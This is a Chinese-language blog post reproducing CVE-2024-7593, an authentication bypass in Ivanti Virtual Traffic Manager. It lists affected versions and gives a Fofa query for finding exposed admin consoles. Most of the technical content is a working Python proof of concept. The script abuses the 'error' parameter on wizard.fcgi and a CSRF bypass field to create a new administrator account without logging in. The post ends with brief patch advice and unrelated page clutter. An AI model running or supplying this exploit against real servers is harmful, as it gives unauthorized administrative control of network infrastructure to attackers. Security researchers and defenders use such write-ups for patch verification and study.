Ivanti Virtual Traffic Manager身份验证绕过(CVE-2024-7593)

最新推荐文章于 2024-08-30 18:30:00 发布
最新推荐文章于 2024-08-30 18:30:00 发布
阅读量166 收藏 1
点赞数 10
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/141719089
版权

0x01 漏洞描述:

Ivanti Virtual Traffic Manager是一款高级的应用交付控制解决方案,旨在帮助企业提高应用程序的性能、可用性和安全性。该产品通过智能的负载均衡、全局服务器负载平衡、SSL加速和应用程序安全等功能,有效管理和优化网络流量,确保应用程序的顺畅运行。Ivanti Virtual Traffic Manager支持多种应用部署模式,包括传统数据中心、云环境和混合部署,为企业提供灵活的部署选项。由于身份验证算法错误,未经身份验证的攻击者绕过面向互联网的vTM管理控制台上的身份验证,导致可以对Ivanti vTM管理界面的未授权访问,并创建恶意管理用户。

0x02 影响版本:

Ivanti Virtual Traffic Manager 22.2
Ivanti Virtual Traffic Manager 22.3
Ivanti Virtual Traffic Manager 22.3R2
Ivanti Virtual Traffic Manager 22.5R1
Ivanti Virtual Traffic Manager 22.6R1
Ivanti Virtual Traffic Manager 22.7R1

0x03 搜索语句:

Fofa:"Pulse Secure vTM Administration Server"

0x04 漏洞复现:

poc

import requests

# Set to target address
admin_portal = 'https://your-ip:9090'

# User to create
new_admin_name = 'ldwkadmin'
new_admin_password = 'ldwkadmin1234'

requests.packages.urllib3.disable_warnings() 
session = requests.Session()

# Setting 'error' bypasses access control for wizard.fcgi.
# wizard.fcgi can load any section in the web interface.
params = { 'error': 1,
          'section': 'Access Management:LocalUsers' }

# Create new user request
# _form_submitted to bypass CSRF
data = {  '_form_submitted': 'form',
          'create_user': 'Create',
          'group': 'admin',
          'newusername': new_admin_name,
          'password1': new_admin_password,
          'password2': new_admin_password }

# Post request
r = session.post(admin_portal + "/apps/zxtm/wizard.fcgi", params=params, data=data, verify=False, allow_redirects=False)

# View response
content = r.content.decode('utf-8')
print(content)

if r.status_code == 200 and '<title>2<' in content:
    print("New user request sent")
    print("Login with username '" + new_admin_name + "' and password '" + new_admin_password + "'")
else:
    print("Unable to create new user")

 

使用修改后的账号密码登录

 

0x05 修复建议:

目前厂商已发布可更新版本,建议用户尽快更新至 Ivanti Virtual Traffic Manager 的修复版本或更高的版本:

Ivanti Virtual Traffic Manager 22.2R1
Ivanti Virtual Traffic Manager 22.3R3
Ivanti Virtual Traffic Manager 22.3R3
Ivanti Virtual Traffic Manager 22.5R2
Ivanti Virtual Traffic Manager 22.6R2
Ivanti Virtual Traffic Manager 22.7R2

iSee857
关注
  • 10
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Ivanti VPN RCE漏洞复现(CVE-2024-21887)
0xSec
01-18 2091
Ivanti Connect Secure (9.x, 22.x) 和Ivanti Policy Secure (9.x, 22.x) 的web组件中存在身份验证绕过漏洞(CVE-2023-46805)和命令注入漏洞(CVE-2024-21887),成功利用该漏洞链允许远程未经认证的攻击者以root权限执行任意操作系统命令,导致服务器失陷。
CVE-2024-21887)Ivanti 远程命令注入漏洞
XZ_______的博客
04-22 482
CVE-2024-21887)Ivanti 远程命令注入漏洞
漏洞复现-Ivanti Sentry 身份验证绕过漏洞 CVE-2023-38035
玄道的网安博客
08-12 375
Ivanti MobileIron Sentry 9.18.0 及更低版本中的 MICS 管理门户中存在安全漏洞,由于 Apache HTTPD 配置限制不足,该漏洞可能允许攻击者绕过管理界面上的身份验证控制。我们看看前面的remoting-servlet.xml,发现该服务引用了一个名为SentryMicsHessianServiceExporter的类,它是一种二进制/XML RPC。是一家IT软件公司,它生产用于IT安全,IT服务管理,IT资产管理,统一端点管理,身份管理和供应链管理的软件。
Ivanti Connect Secure VPN SSRF漏洞复现(CVE-2024-21893)
0xSec
02-06 1103
此漏洞是由于Ivanti Connect Secure、Ivanti Policy Secure和 Ivanti Neurons for ZTA 的 SAML 组件中存在服务器端请求伪造漏洞,因此攻击者可利用该漏洞在未经身份验证的情况下访问某些受限资源,结合相关功能造成远程代码执行。
Ivanti Pulse Connect Secure VPN 远程代码执行漏洞复现(CVE-2023-46805)
m0_50797689的博客
01-24 774
Ivanti Pulse Connect Secure VPN 远程代码执行漏洞复现(CVE-2023-46805)
Active MQ 任意文件写入漏洞/远程代码执行漏洞(CVE-2016-3088)
初岄的博客
09-13 1332
Active MQ 任意文件写入漏洞/远程代码执行漏洞(CVE-2016-3088)
网络安全售前入门06安全服务——基线检测服务方案
打工人
08-30 990
安全基线检查可以帮助单位认清自身风险现状和漏洞隐患,使业务系统的风险维持在可控范围内。根本目的是保障业务系统的安全,是为了避免人为疏忽或错误,或使用默认的安全配置,给业务系统安全造成风险而制定的安全检查标准,并且采取必要的安全检查措施,使业务系统达到相对的安全指标要求。
【网络安全】网络安全中的常见攻击方式:被动攻击、主动攻击与中间人攻击
一定要站在自己热爱的生活里闪闪发光
08-27 373
在信息化时代,网络安全已经成为企业和个人都非常关注的领域。无论是个人隐私还是企业机密,随着互联网的广泛应用,保护这些信息免受攻击变得越来越重要。攻击者通过各种方式试图获取、篡改或破坏信息,这些方式大致可以分为被动攻击、主动攻击和中间人攻击三类。了解这些攻击方式有助于我们更好地保护自己的信息安全
信息安全--(四)网络安全体系与安全模型(二)
m0_60936698的博客
08-30 601
■ 等级保护分为五个:第一级(用户自主保护级)、第二级(系统审计保护级)、第三级(安全标记保护级)、第四级(结构化保护级)、第五级(访问验证保护级)。■ ①扩大了对象方位,将云计算、移动互联、物联网、工业控制系统等列入标准范围,构成了“网络安全 通用要求+新型应用的网络安全扩展要求”的要求内容。■ 管理手段:包括安全评估、安全监管、应急响应、安全协调、安全标准和规范、保密检查、认证和访 问控制等;管理目标: (大)政治、经济、文化、国防安全等,(小)网络系统的保密、可用、可控等。·监督安全项目的实施;
入门网络安全工程师要学习哪些内容
最新发布
白帽子佳奇的博客
08-30 536
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
【网络安全】XML-RPC漏洞之盲SSRF
等风来
08-27 283
我收到的响应是这样的,响应体中的状态为0,表示请求已成功发送:
2024年入职/转行网络安全,该如何规划?_网络安全职业规划
2401_85023531的博客
08-23 2119
前段时间,知名机构麦可思研究院发布了《2022年中国本科生就业报告》,其中详细列出近五年的本科绿牌专业,其中,信息安全位列第一。
网络安全售前入门07安全服务——主机漏洞扫描服务方案
打工人
08-30 371
漏洞扫描服务主要针对系统层、网络层、数据层、应用层进行安全评估,即对客户使用系统的运行环境进行安全评估。
Oracle 网络安全产品安全认证检索
In-Memory Computing Technology
08-30 289
列入《网络关键设备和网络安全专用产品目录》的网络安全专用产品应当按照《信息安全技术网络安全专用产品安全技术要求》等相关国家标准的强制性要求,由具备资格的机构安全认证合格或者安全检测符合要求后,方可销售或者提供。Oracle Zero Data Loss Recovery Appliance (ZDLRA)属于此类,ZDLRA RA23于2024年7月通过网络安全专用产品安全检测,标志着这款产品完全符合中国政府对于安全产品的要求,包括技术及供应链安全要求。检测结果已在网信办官网上发布。
网络安全的历史
网络研究观
08-27 1179
直到多年以后,由于网络攻击和危险实体威胁的频繁发生,网络安全的发展才受到重视。
网络安全之渗透测试实战-DC-3-靶机入侵
DoubleJing的博客
08-27 903
(2)但是目标主机处于内网环境是不可以被外网直接访问,只能主动将shell反弹出来.这种方式称作反弹shell,反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端,本质上是网络概念的客户端与服务端的角色反转。Web指纹定义:Web指纹是一种对目标网站的识别技术,通过识别网站所使用的服务器、运行的脚本、安装的CMS等信息对目标进行精准的分类和定位。获取本网段的主机信息,根据MAC地址比对来获取DC-3的IP地址。
【网络安全】XML-RPC PHP WordPress漏洞
等风来
08-27 151
本文将解释xmlrpc.php WordPress 漏洞及利用方式,并以三种攻击方法进行阐发:1、用户名枚举。2、跨站点端口攻击 (XSPA) 或端口扫描。3、使用 xmlrpc.php 进行暴力攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值